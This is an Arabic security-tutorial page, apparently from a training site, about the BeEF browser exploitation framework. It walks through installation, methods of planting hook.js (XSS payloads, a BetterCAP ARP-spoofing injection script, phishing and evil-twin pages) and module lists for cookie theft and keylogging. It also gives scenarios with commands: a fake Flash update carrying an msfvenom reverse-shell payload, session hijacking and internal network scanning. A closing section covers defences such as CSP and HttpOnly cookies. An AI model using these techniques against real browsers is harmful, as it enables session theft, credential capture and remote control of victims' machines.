هذه الأداة تخترق متصفحك بدون أن تشعر — كيف يعمل BeEF؟

هذه الأداة تخترق متصفحك بدون أن تشعر — كيف يعمل BeEF؟

BeEF — اختراق المتصفح من الداخل | GloSecLab
🐂
BROWSER EXPLOITATION FRAMEWORK

BeEF

Browser Exploitation Framework

أداة الاختراق التي تجعل المتصفح نفسه سلاحاً — hook.js واحد يمنحك تحكماً كاملاً في جلسة الضحية وشبكتها الداخلية

🎣 HOOK
BEACON
ZOMBIE
EXPLOIT
💀 PWNED
300+MODULES
2006SINCE
XSSVECTOR
ALLBROWSERS
SCROLL
// 01 — INTRODUCTION

BeEF — المتصفح كسلاح

Client-Side Exploitation — الهجوم من الداخل

BeEF (Browser Exploitation Framework) منصة اختبار اختراق مفتوحة المصدر تركّز على Client-Side Attack Vectors. طوّرها Wade Alcorn عام 2006، مكتوبة بـ Ruby وJavaScript. المرجع الأول لاختبار أمان المتصفحات وهجمات XSS المتقدمة.

الفكرة المحورية: حتى الشبكة المحصّنة بـ Firewall وIDS — المتصفح يبقى الباب المفتوح. BeEF يدخل من هذا الباب ويُسيطر على جلسة المستخدم من الداخل.

على عكس Metasploit الذي يستهدف الـ OS والخدمات، BeEF يستهدف المستخدم نفسه — Cookies، Sessions، كلمات المرور، الكاميرا، الشبكة الداخلية.

⚠️ تحذير قانوني: استخدام BeEF على متصفحات بدون إذن صريح هو جريمة جنائية. استخدمه فقط في DVWA وMetasploitable وبيئات تدريبية مرخّصة.
// 02 — HOW IT WORKS

كيف يعمل؟

من hook.js إلى تحكم كامل في المتصفح

01
// INFECTION

🎣 الضحية تزور صفحة تحتوي hook.js

عبر XSS مزروع في موقع حقيقي، أو صفحة خبيثة، أو حقن MitM — المهم أن المتصفح يُحمّل hook.js.

02
// BEACON

📡 Polling مستمر مع BeEF Server

hook.js يُنشئ XHR/WebSocket connection يُرسل Heartbeat كل ثوانٍ — يُبقي المتصفح "حياً" بدون علم المستخدم.

03
// ZOMBIE BROWSER

💻 يظهر في Control Panel كـ Hooked Browser

تظهر معلومات المتصفح تلقائياً: OS، Browser، IP، Plugins، Cookies، Screen، Timezone.

04
// COMMAND & CONTROL

🎯 تختار Module وترسل الأمر

من واجهة الويب تختار من 300+ Module — كل منها JavaScript يُنفَّذ في سياق متصفح الضحية مباشرة.

05
// RESULT

💀 المتصفح ينفّذ ويُعيد النتيجة

Cookies مسروقة، Credentials ملتقطة، شبكة داخلية مكشوفة، Meterpreter Session — كل هذا من داخل المتصفح.

// 03 — INSTALLATION

التثبيت والإعداد

من الصفر للتشغيل

// BEEF — Install & Configure
# Kali Linux — مثبت مسبقاً root@kali:~$ beef-xss root@kali:~$ service beef-xss start # من GitHub root@kali:~$ git clone https://github.com/beefproject/beef root@kali:~$ cd beef && ./install && ./beef # Docker root@kali:~$ docker run -p 3000:3000 -it beefproject/beef # config.yaml — تعديل مهم root@kali:~$ nano /usr/share/beef-xss/config.yaml beef.credentials.user: "beef" beef.credentials.passwd: "StrongPass2026!" beef.http.host: "0.0.0.0" beef.http.port: 3000 # بعد التشغيل [*] Web UI: http://127.0.0.1:3000/ui/panel [*] Hook URL: http://127.0.0.1:3000/hook.js [*] BeEF server started ✓
💡 مهم: غيّر beef.http.host إلى IP جهازك الحقيقي — الضحية تحتاج تصل لـ hook.js من جهازها عبر الشبكة.
// 04 — CONTROL PANEL

واجهة التحكم

مركز القيادة والسيطرة على المتصفحات

// TAB 01
Details
Browser، OS، IP، Plugins، Cookies، Screen، Timezone، Battery — كل معلومات الضحية تلقائياً.
// TAB 02
Logs
سجل كامل لكل الأوامر والنتائج والنشاطات مع الطوابع الزمنية.
// TAB 03
Commands
شجرة 300+ Module مع أيقونات ملوّنة لحالة كل Module على هذا المتصفح بالذات.
// TAB 04
Rider
HTTP Proxy عبر المتصفح — ترسل Requests من المتصفح المخترق للوصول لمحتوى داخلي.
// TAB 05
XssRays
يفحص الروابط في الصفحة تلقائياً بحثاً عن ثغرات XSS إضافية في نفس الموقع.
// TAB 06
Network
Port Scanning وPing Sweep للشبكة الداخلية من خلال متصفح الضحية كـ Pivot.
أخضر = يعمل وغير مرئي
برتقالي = مرئي للمستخدم
رمادي = غير محقق بعد
أحمر = لن يعمل هنا
// 05 — HOOKING METHODS

طرق Hook المتصفح

كيف توصل hook.js للضحية؟

01
// XSS INJECTION

Stored / Reflected XSS

حقن الـ Hook في موقع يحتوي ثغرة XSS. كل زائر يصبح Hooked تلقائياً — الأقوى مع Stored XSS.

02
// PHISHING PAGE

صفحة خبيثة تحت سيطرتك

إنشاء صفحة تحتوي hook.js مباشرة وإرسال رابطها عبر Phishing Email أو رابط مختصر.

03
// MAN IN THE MIDDLE

حقن عبر BetterCAP

حقن hook.js في كل صفحة HTTP يزورها الضحية على نفس الشبكة تلقائياً.

04
// EVIL TWIN + BeEF

Fluxion / Wifiphisher + BeEF

تضمين hook.js في Captive Portal — كل من يتصل بالـ Evil Twin يصبح Hooked.

05
// BROWSER EXTENSION

إضافة متصفح خبيثة

Extension تحتوي hook.js — الـ Hook يستمر حتى بعد إغلاق الصفحة الأصلية.

// HOOK — Injection Methods
## الأساس <script src="http://BEEF_IP:3000/hook.js"></script> ## XSS Injection "> ## BetterCAP Script — beef_inject.js function onResponse(req, res) { if(res.ContentType.includes('text/html')) { var hook = '<script src="http://10.10.14.5:3000/hook.js"></script>'; res.Body = res.Body.replace('</body>', hook + '</body>'); } } ## تشغيل BetterCAP root@kali:~$ bettercap -iface eth0 -eval "set http.proxy.script beef_inject.js; http.proxy on; arp.spoof on"
// 06 — MODULES

الـ Modules — 300+ سلاح

منظّمة في فئات حسب نوع الهجوم

// NETWORK
Network Discovery
Ping Sweep، Port Scanning، WebRTC IP Leak، DNS Enumeration من داخل متصفح الضحية.
// 30+ modules
// FINGERPRINT
Browser Fingerprint
OS، Version، Plugins، Screen، Timezone، Battery، Geolocation، Canvas Fingerprint.
// 50+ modules
// SOCIAL ENG
Social Engineering
Fake Login، Fake Flash Update، Notification Bar، TabNabbing، Clickjacking.
// 40+ modules
// CREDENTIALS
Credential Theft
Key Logger، Cookie Theft، Saved Passwords، Form Hijacking، Auto-fill Extraction.
// 25+ modules
// EXPLOITS
Browser Exploits
استغلال ثغرات في المتصفح والـ Plugins للوصول لنظام الملفات أو تنفيذ كود.
// 60+ modules
// PERSISTENCE
Maintain Hook
Service Worker Hook، Man-in-the-Browser، Tab Persistence، Re-hook بعد الإغلاق.
// 15+ modules
// MODULES — Most Used
Browser > Get Cookie # سرقة Cookies Browser > Get Geolocation # الموقع الجغرافي Network > Get Internal IP (WebRTC) # IP داخلي Network > Port Scanner # فحص البورتات Network > Ping Sweep # اكتشاف الـ Hosts Social Engineering > Google Phishing # نافذة Google وهمية Social Engineering > Fake Notification Bar # شريط إشعار وهمي Social Engineering > TabNabbing # خطف الـ Tab Host > Key Logger # تسجيل الكيبورد
// 07 — SCENARIOS

سيناريوهات هجوم حقيقية

من الـ Hook للـ Shell

سيناريو 01 — Cookie Theft → Session Hijacking

// SESSION HIJACKING
## Hook المتصفح عبر XSS "> ## Browser > Get Cookie [*] PHPSESSID=abc123def456; auth_token=eyJhbGci... ## Burp Suite → Edit Cookie → أنت الآن الضحية! [+] Authenticated as: admin@target.com

سيناريو 02 — Fake Flash → Meterpreter

// FAKE UPDATE → REVERSE SHELL
## STEP 1: توليد Payload root@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o flashupdate.exe ## STEP 2: Social Engineering > Fake Notification Bar ## "Flash Player Update Required" → URL → flashupdate.exe ## STEP 3: MSF Handler msf6 > use exploit/multi/handler && set PAYLOAD windows/x64/meterpreter/reverse_tcp && run -j [*] Meterpreter session 1 opened ✓

سيناريو 03 — Internal Network Recon عبر المتصفح

// PIVOT THROUGH BROWSER
## Network > Get Internal IP (WebRTC) [*] Internal IP: 192.168.10.45 | Subnet: 192.168.10.0/24 ## Network > Ping Sweep [*] 192.168.10.1 ALIVE — Router [*] 192.168.10.20 ALIVE — Server ## Network > Port Scanner → 192.168.10.20 [*] 22 OPEN — SSH [*] 80 OPEN — HTTP [*] 445 OPEN — SMB ← EternalBlue؟
// 08 — REST API

REST API — الأتمتة الكاملة

تحكم في BeEF بدون واجهة

// REST API COMPLETE
## Login + Token root@kali:~$ curl -X POST -H "Content-Type: application/json" -d '{"username":"beef","password":"beef"}' http://127.0.0.1:3000/api/admin/login {"success":true,"token":"a1b2c3..."} ## Hooked Browsers root@kali:~$ curl http://127.0.0.1:3000/api/hooks?token=a1b2c3 ## تشغيل Module root@kali:~$ curl -X POST -d '{"module":"alert_dialog","options":{"alertmsg":"Hooked!"}}' http://127.0.0.1:3000/api/modules/1/run?token=a1b2c3 ## Python Automation import requests url = "http://127.0.0.1:3000" token = requests.post(f"{url}/api/admin/login", json={"username":"beef","password":"beef"}).json()["token"] hooks = requests.get(f"{url}/api/hooks?token={token}").json() print(f"Online: {len(hooks['hooked-browsers']['online'])} browsers")
// 09 — INTEGRATIONS

التكامل مع الأدوات الأخرى

BeEF وحده قوي — مع غيره لا يُقهر

💥
Metasploit
تحويل Browser Hook إلى Meterpreter Session عبر MSF Integration الرسمي.
🕵️
BetterCAP
حقن Hook في كل صفحة HTTP على الشبكة تلقائياً عبر HTTP Proxy Script.
🎭
Fluxion
تضمين Hook في Captive Portal — كل من يتصل بالـ Evil Twin يُصاب.
🔍
Burp Suite
اكتشاف XSS + تضمين BeEF Hook فيها تلقائياً.
🐍
Python REST
أتمتة كاملة — تحكم في كل Hooked Browser برمجياً بدون واجهة.
🌐
Phishing Pages
دمج Hook في Phishing Pages مخصصة لاستهداف مؤسسات محددة.
// BeEF + METASPLOIT
## config.yaml beef.extension.metasploit.enable: true beef.extension.metasploit.host: "127.0.0.1" beef.extension.metasploit.port: 55552 beef.extension.metasploit.user: "msf" beef.extension.metasploit.pass: "abc123" ## MSF msf6 > load msgrpc User=msf Pass=abc123 [+] Metasploit connected! MSF Exploits الآن في BeEF Panel.
// 10 — DEFENSE

الدفاع والحماية

كيف تمنع Hook المتصفح؟

🛡️
Content Security Policy
script-src 'self' — يمنع تحميل أي Script خارجي بما فيها hook.js. أقوى دفاع واحد ضد BeEF.
🍪
HttpOnly + Secure Cookies
يمنع JavaScript من قراءة الـ Cookies — يُبطل Cookie Theft Modules كلياً.
🔒
XSS Prevention
Sanitize كل Input. بدون XSS لا يمكن حقن hook.js في الموقع أصلاً.
🖥️
Browser Extensions
uBlock Origin وNoScript يمنعان تحميل Scripts من دومينات خارجية غير موثوقة.
🔥
WAF
يكتشف محاولات حقن hook.js ويحجبها قبل وصولها للمستخدم النهائي.
🏢
WPA3-Enterprise
يمنع Evil Twin + BeEF Attacks على الشبكة الداخلية بالكامل.
💡 الأهم: Content Security Policy (CSP) هو الدفاع الأقوى — يمنع hook.js حتى لو نجح المهاجم في XSS.

BeEF يُثبت أن أخطر الهجمات تأتي من الداخل — من المتصفح الذي يثق فيه المستخدم يومياً. لا يحتاج ثغرة في النظام، ولا كسر تشفير — فقط JavaScript في السياق الصحيح. إتقان BeEF = فهم عميق لسطح الهجوم الأكثر إهمالاً في الأمن السيبراني.

// PENETRATION TESTING · KALI LINUX · OSINT //

© 2026 GloSecLab — للأغراض التعليمية والأخلاقية فقط